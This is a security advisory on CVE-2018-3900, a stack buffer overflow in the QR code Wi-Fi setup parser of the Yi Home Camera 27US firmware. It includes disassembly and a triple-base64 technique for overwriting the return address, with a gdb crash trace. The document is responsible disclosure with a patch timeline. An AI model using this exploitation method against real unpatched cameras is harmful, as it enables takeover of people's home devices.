CVE-2018-3900
An exploitable code execution vulnerability exists in the QR code scanning functionality of Yi Home Camera 27US 1.8.7.0D. A specially crafted QR Code can cause a buffer overflow, resulting in code execution. An attacker can make the camera scan a QR code to trigger this vulnerability. Alternatively, a user could be convinced to display a QR code from the internet to their camera, which could exploit this vulnerability.
Yi Technology Home Camera 27US 1.8.7.0D
9.1 – CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWE-121: Stack-based Buffer Overflow
Yi Home Camera is an IoT home camera sold globally. The 27US version is one of the newer models sold in the U.S., and is the most basic model out of the Yi Technology camera lineup. It still, however, includes all the functionality that one would expect from an IOT device: viewing from anywhere, offline and subscription-based cloud storage, and ease of setup.
During the network configuration stage of the setup, the Yi camera prompts the user to show it a QR code that is generated by the app running on the user’s phone. The user types in the SSID and password of the network that they wish to connect the camera to, and then the app communicates to https://api.us.xiaoyi.com
, asking for a bindkey
, which is used for identification of the device on the server side.
GET /v2/qrcode/get_bindkey?hmac=<redact> %3D&userid=00110011&seq=1×tamp=1522268058227 HTTP/1.1
Content-Length: 0
Host: api.us.xiaoyi.com
Connection: Keep-Alive
User-Agent: YI Home/2.20.20.0_20180227 (Alcatel_4060A; Android 10.2; en-US)
Accept-Encoding: gzip
x-xiaoyi-appVersion: android;73;2.20.20.0_20180227
After the response has been received, the phone will generate a QR code that contains the following data: b=USmtPf6GnLZYDuR9&s=PCheX14pPg==&p=AbCD123465
. Where by the b
field is the bindkey found in the https response, s
is the base64 encoded SSID of the network, and p
is the the base64 encoded password that has been encoded against a static string. It should definitely be asserted here that the password and SSID do not get sent over the network, only the bindkey gets asked for and returned, but it should also be noted that this vulnerability can still be triggered by the end server at this stage if it sends a bind key that contains the &p=
string.
After this QR code has been generated, the user shows this to the camera, which will then scan it using the underlying ZBAR QR Code scanning library (https://github.com/Zbar/Zbar)[https://github.com/Zbar/Zbar]. After the string has been read in by the camera, it is parsed by the following code:
MOV R2, R7 //[1]
LDR R1, =aP ; "&p="
ADD R0, SP, #0x1A8+password_dst
BL trans_json_2 ; (output,needle,haystack) //[2]
MOV R2, R7
LDR R1, =aS ; "&s="
ADD R0, SP, #0x1A8+ssid_dst
BL trans_json_2 ; (output,needle,haystack) //[2]
MOV R2, R7
LDR R1, =aB ; "b="
ADD R0, SP, #0x1A8+bindkey_dst
BL trans_json_2 ; (output,needle,haystack) //[2]
For some reason, it uses modified JSON parsing function [2] to grab the values of each of these keys, looking inside the string scanned by the QR code stored in R7 [1]. The results of each of these scans are stored on addresses on the stack (*_dst), which looks like such:
qrcode_scan
zbar_get_name= -0x1A8
[…]
bindkey_dst= -0x188
decoded_ssid= -0x168
decrypted_key= -0x128
ssid_dst= -0xE8
password_dst= -0xA8
decoded_password= -0x68
Immediately after reading these values into the stack, the password
and ssid
values are base64 decoded with a custom implementation of the conversion:
ADD R1, SP, #0x1A8+decoded_ssid
ADD R0, SP, #0x1A8+ssid_dst
BL b64_decode ; (input,output)
MOV R1, R5 // [1]
ADD R0, SP, #0x1A8+password_dst
BL b64_decode ; (input,output)
Importantly, the output of both these calls to b64_decode
also go on the stack, with the destination for the password decoding being R5 [1], which is the decoded_password
variable on the stack, which is conveniently located immediately above the return address. The underlying bug is within the b64_decode function, which doesn’t really have any size constraints on the output. This function will never exit unless it has detected an equals sign or a null inside of the processed data, and only at certain offsets within the buffer.
LDRB R3, [R4,#-1]
MOV R6, R4
CMP R3, #0
BEQ func_prolog
[…]
LDRB R2, [R4,#1]
ADD R1, R10, #1
CMP R2, #'='
BEQ ret_path
[...]
CMP R3, #'='
ADD R5, R5, #3
BEQ ret_path
So, it follows that if a someone passes a string without any equals signs (or nulls), it’ll just keep going, which is not the most secure implementation, and can easily result in a buffer overflow, since the stack destinations are all 0x40 in length, but the input string read in is not bounded except by the QR reader implementation itself, which for some reason seems to only be able to read QRCodes which store ~263 (0x107) bytes of data.
Regardless, when decoding the password
field from password_dst
to decoded_password
, an interesting thing occurs when passing in a length 0x40 base64 encoded password, if only due to the layout of the stack:
[...]
password_dst= -0xA8
decoded_password= -0x68
(return_address)
(old_stack_base)
Since the source and the destination are next to each other, as long as both the source destination do not contain =
or \x00
, the program keeps decoding further and further down the stack, and will start reusing the decoded_password
field as the source of its decoding, allowing us to write further down than intended, as long as the decoded base64 is also valid base64 encoded data.
Since base64 decoding results in a reduction by 25% from input length to output length, the first iteration of decoding puts us at [decoded_password+0x30]
, since the input length is going to be 0x40. Then, as long as our data is base64 encoded twice, we go another 0x24 bytes further in the destination, resulting in a write to [decoded_password+0xc]
. Finally, as long as that last 0x24 bytes has also been base64 encoded, we can write further down the stack, reaching the return address with a controlled write by triply base64 encoding the final payload.
This payload does not get triggered until the function actually returns, which actually only occurs once a valid code has been scanned. Thus, if a malicious code is scanned before the owner scans their own QR code for their network credentials, the payload will be triggered immediately when a network connection is gained, so it should be cautioned that users should not scan QR codes found wandering throughout the internet. Alternatively, as discussed earlier, the server could send back the p
and s
strings, triggering the vulnerability as well.
Thread 1 "rmm" received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb) bt
#0 0x90909090 in ?? ()
#1 0xb6eb33a0 in ?? () from /lib/libc.so.0
#2 0xfffffffe in ?? ()
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
(gdb) info reg
r0 0x0 0
r1 0x0 0
r2 0xd7be687b 3619580027
r3 0xd7be687b 3619580027
r4 0x51434a6b 1363364459
r5 0x51434a6b 1363364459
r6 0x51434a6b 1363364459
r7 0x51434a6b 1363364459
r8 0x90909090 2425393296
r9 0x90909090 2425393296
r10 0x90909090 2425393296
r11 0x90909090 2425393296
r12 0xb6f00210 3069182480
sp 0xbea51ae8 0xbea51ae8
lr 0xb6eb33a0 3068867488
pc 0x90909090 0x90909090
cpsr 0x68000010 1744830480
2018-05-01 - Vendor disclosure
2018-09-03 - Vendor submitted build to Talos for testing
2018-09-05 - Talos confirmed issue patched
2018-10-22 - Vendor released new firmware
2018-10-31 - Public release
Discovered by Lilith (>_>) of Cisco Talos.